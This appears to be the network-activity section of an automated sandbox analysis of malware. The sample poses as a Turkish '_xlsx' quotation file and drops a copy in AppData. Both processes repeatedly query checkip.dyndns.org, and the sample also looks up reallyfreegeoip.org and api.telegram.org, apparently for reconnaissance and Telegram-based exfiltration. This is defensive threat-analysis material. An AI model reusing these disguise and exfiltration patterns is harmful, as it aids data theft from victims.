Oct 7, 2024 14:52:48.784614086 CEST	49744	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:53.359272957 CEST	49796	80	192.168.2.7	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 14:52:21.123794079 CEST	56220	53	192.168.2.7	1.1.1.1
Oct 7, 2024 14:52:21.130891085 CEST	53	56220	1.1.1.1	192.168.2.7
Oct 7, 2024 14:52:22.044781923 CEST	63291	53	192.168.2.7	1.1.1.1
Oct 7, 2024 14:52:22.054600000 CEST	53	63291	1.1.1.1	192.168.2.7
Oct 7, 2024 14:52:32.805818081 CEST	62586	53	192.168.2.7	1.1.1.1
Oct 7, 2024 14:52:32.813020945 CEST	53	62586	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 14:52:21.123794079 CEST	192.168.2.7	1.1.1.1	0x1866	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:22.044781923 CEST	192.168.2.7	1.1.1.1	0xbb69	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:32.805818081 CEST	192.168.2.7	1.1.1.1	0xe036	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 14:52:21.130891085 CEST	1.1.1.1	192.168.2.7	0x1866	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 14:52:21.130891085 CEST	1.1.1.1	192.168.2.7	0x1866	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:21.130891085 CEST	1.1.1.1	192.168.2.7	0x1866	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:21.130891085 CEST	1.1.1.1	192.168.2.7	0x1866	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:21.130891085 CEST	1.1.1.1	192.168.2.7	0x1866	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:21.130891085 CEST	1.1.1.1	192.168.2.7	0x1866	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:22.054600000 CEST	1.1.1.1	192.168.2.7	0xbb69	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:22.054600000 CEST	1.1.1.1	192.168.2.7	0xbb69	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 14:52:32.813020945 CEST	1.1.1.1	192.168.2.7	0xe036	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49722	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:21.143676996 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:21.797427893 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c11e5fea23f0fc17a0b1055c6fc47b42 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 14:52:21.803406000 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:22.005261898 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 92168b7957e00e544b450598e12fd823 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 14:52:22.971702099 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:23.182259083 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b9cc70c7d014a34493da2748049a9db5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49744	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:23.802640915 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:24.447212934 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3bd99f1689ea1b8cc3b9ae84836b2c21 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49754	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:25.043914080 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:25.713902950 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f4a1a7733db9ba46d693d924420e73f2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49758	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:25.231070042 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:25.909573078 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e0f4947810adb4674d8f5816180cbd53 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 14:52:25.913847923 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:26.117898941 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3aa7e9558e4d122922cae6bc44ca6ff3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 14:52:26.328260899 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3aa7e9558e4d122922cae6bc44ca6ff3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 14:52:26.806149006 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:27.010426998 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b94cd715d5d8b033057d6981f8b0d3c6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49769	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:26.337510109 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:26.990237951 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e07ec2da2a1489b1bdb24afd9da7cf78 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49782	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:27.637656927 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:28.292773008 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 04b0ae93d30d39c0ab39a916349b4029 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49783	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:27.639215946 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:28.383421898 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8c3eb07f733585ea04f7081a76297ba9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49791	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:28.917120934 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:29.610243082 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fbada9c24651374e266482d9b46fe0b7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49796	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:29.047697067 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 14:52:29.719218016 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c761540c63d63342735080482afc05b2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49805	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:30.238791943 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:30.883985996 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ed6e0eeb06942241e7821b9716806046 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49806	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:30.359100103 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:31.007693052 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c703abb0b96ec1cf4e2c60d51caff330 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49818	132.226.247.73	80	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:31.547729969 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:32.190016985 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 689cd78fcd9b4499e6a48d3183a6cd0d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49819	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:31.677540064 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:32.351125956 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bc30a4fddd91434598fe782c1a2b3175 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49834	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:33.509063959 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:34.161607981 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2c4064d85820eb46adce0a5b6cac6ba5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49844	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:34.786511898 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 14:52:35.449213982 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 42eb3df13fc4574b9caff36028587706 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49862	132.226.247.73	80	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 14:52:36.561764956 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
